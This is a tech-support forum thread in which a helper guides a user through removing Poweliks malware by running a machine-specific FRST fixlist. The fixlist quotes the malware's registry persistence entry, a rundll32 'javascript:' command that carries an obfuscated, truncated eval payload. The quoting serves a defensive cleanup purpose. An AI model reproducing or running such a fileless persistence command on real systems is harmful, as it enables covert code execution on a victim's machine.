Need help removing multiple Explorer processes please

I am getting the constant pop up - Avast - avast! Web Shield has blocked a harmful webpage or file.

Various objects have appeared: go.wvydeo.com/results . . ., xmlka.com/click?app . . ., cdn1.movieroomreview.com/themes . . ., HTML: Redirector-gy [Trj]

The infection is usually URL:Mal…except that last one.

Process C:\Program Files.…\iexplorer.exe

I’m a newbie on here but read elsewhere here that I should start my own topic for this issue and look in task manager for multiple Explorer processes. I’ve got one explorer and two iexplorer processes. Is that all I’m looking for? And how do I get rid of this? Having an ISP outage or slow down in my area so will check back as I’m able.

Attach your basic logs. (MBAM, FRST and aswMBR…!!)
Instructions: https://forum.avast.com/index.php?topic=53253.0

Internet service was off yesterday and most of today but when I just got it back on to work on this, there have been no pop-ups so I decided out of curiosity to check the task manager and those two iexplorer processes are gone. I don’t understand that since I hadn’t even begun to run the scan instructions and logs you requested. Should I still go ahead with that? Is it possible that my problem has resolved itself?

Also if this is miraculously gone, how would I prevent it from happening again?

Attach the logs and find out … the check dont hurt

I was wrong, it’s not gone. Pop-ups started again and this time I have THREE “iexplorer” processes running instead of two. Plus it’s really slowing down my internet connection. I suspect that’s been the case all along now even though supposedly there are speed issues reported in my area anyway. In order to get some speed for downloading the scans, can I just “end” some of those processes? At this rate it’s going to take forever to get the logs done.

Hope I did this correctly. This is the malwarebytes log. I had run this same scan last week when I first had this issue and it DID find issues then but I don’t know if I can get a copy of that log still or whether this is sufficient. There were no issues on this scan.

Farbar recovery logs

I accidently saved this prior to the end of the scan then saved it again at the end. Hope that didn’t make a difference here. I thought it was through scanning sooner.

Hi this will kill it

CAUTION : This fix is only valid for this specific machine, using it on another may break your computer

Open notepad and copy/paste the text in the quotebox below into it:

HKU\S-1-5-21-2706616055-1707385217-3273166068-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks! SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> DefaultScope value is missing. Toolbar: HKLM - No Name - {CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} - No File 2014-12-12 12:04 - 2014-05-13 10:15 - 00010240 _____ () C:\Users\Admin\AppData\Local\Z@!-d61b74fb-ea57-41ea-875c-14737e7b6101.tmp 2014-12-12 12:04 - 2014-05-13 10:15 - 00010240 _____ () C:\Users\Admin\AppData\Local\Z@!-a51c759c-f497-4830-8e3c-bc8e256fcccc.tmp 2014-12-12 12:04 - 2014-05-13 10:15 - 00009216 _____ () C:\Users\Admin\AppData\Local\Z@S!-da26b604-133e-495c-8f8d-c4ecd8656641.tmp CustomCLSID: HKU\S-1-5-21-2706616055-1707385217-3273166068-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks? EmptyTemp: CMD: bitsadmin /reset /allusers

Save this as fixlist.txt, in the same location as FRST.exe

https://dl.dropboxusercontent.com/u/73555776/FRSTfix.JPG

Run FRST and press Fix
On completion a log will be generated please post that

Was I to run a scan THEN fix? How long should the fix take? it’s been 20 minutes so far. getting nervous that I messed it up.

Whew! Finished and here’s the log.

I still see 3 iexplorer processes running in task manager.

EmptyTemp: => Removed 6.4 GB temporary data. this was the reason for the long fix run :slight_smile:

Three Iexplore is quite normal this malware used dllhost file

How is the computer behaving now ?

I remember seeing dllhost in task manager and that’s gone now. Will give it a day or two of use since the pop ups usually seemed to be delayed in starting. Then will post a follow up. So far so good though and I hope it continues to be. Thanks so much for the help!!!